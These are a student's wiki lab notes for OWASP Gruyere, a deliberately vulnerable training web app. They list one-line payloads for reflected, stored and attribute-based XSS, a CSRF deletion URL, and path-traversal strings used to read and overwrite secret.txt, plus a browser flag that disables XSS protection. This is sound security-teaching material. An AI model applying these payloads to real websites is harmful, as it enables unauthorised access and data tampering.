Lab 10: OWASP Gruyere - squatchulator/Tech-Journal GitHub Wiki
XSS (Cross-Site Scripting)
Reflected XSS
(NOTE: If using chrome, use "C:\Documents and Settings\USERNAME\Local Settings\Application Data\Google\Chrome\Application\chrome.exe" --disable-xss-auditor)
To exploit: add /<script>alert(1)</script> to the end of the URL.
Stored XSS
To exploit: add <a onmouseover="alert(1)" href="#">read this!</a> to a snippet.
Stored XSS via HTML Attribute
To exploit: set profile color to red' onload='alert(1)' onmouseover='alert(2)
XSRF (Cross-Site Request Forgery)
To exploit: add the following to URL - /deletesnippet?index=0
Information Disclosure by Path Traversal
To exploit: try adding /../secret.txt to the URL. Most of the time this won't work, so afterwards try %2f..%2fsecret.txt
Data Tampering by Path Traversal
To exploit: Create a new user named .. or brie/../... Upload a new secret.txt. Then visit the URL with %2fbrie%2f..%2f..%2fsecret.txt